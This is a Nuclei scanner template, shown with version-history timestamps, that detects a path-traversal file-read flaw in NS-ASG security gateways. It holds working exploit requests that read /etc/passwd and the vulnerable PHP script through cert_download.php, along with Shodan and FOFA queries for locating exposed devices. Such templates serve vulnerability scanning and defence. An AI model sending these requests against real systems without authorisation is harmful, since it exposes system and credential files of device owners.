nuclei-templates/vulnerabilities/other/ns-asg-file-read.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

2021-06-01 08:39:01 +00:00
id: nsasg-arbitrary-file-read
2021-05-31 08:56:01 +00:00
info:
name: NS ASG - Local File Inclusion
2022-04-07 08:54:10 +00:00
author: pikpikcu,ritikchaddha
2021-05-31 08:56:01 +00:00
severity: high
description: NS ASG is vulnerable to local file inclusion.
2022-04-07 08:53:54 +00:00
reference:
- https://zhuanlan.zhihu.com/p/368054963
- http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md
metadata:
fofa-query: app="网康科技-NS-ASG安全网关"
shodan-query: http.title:“NS-ASG”
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-06-01 08:39:01 +00:00
tags: nsasg,lfi
2021-05-31 08:56:01 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
2022-04-07 08:44:15 +00:00
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
2021-05-31 08:56:01 +00:00
2022-04-07 08:53:54 +00:00
stop-at-first-match: true
matchers-condition: or
2021-05-31 08:56:01 +00:00
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-04-07 09:01:10 +00:00
2022-04-07 08:44:15 +00:00
- type: word
part: body
words:
- "$certfile"
- "application/pdf"
2022-04-07 08:53:54 +00:00
condition: and
# Enhanced by mp on 2022/08/03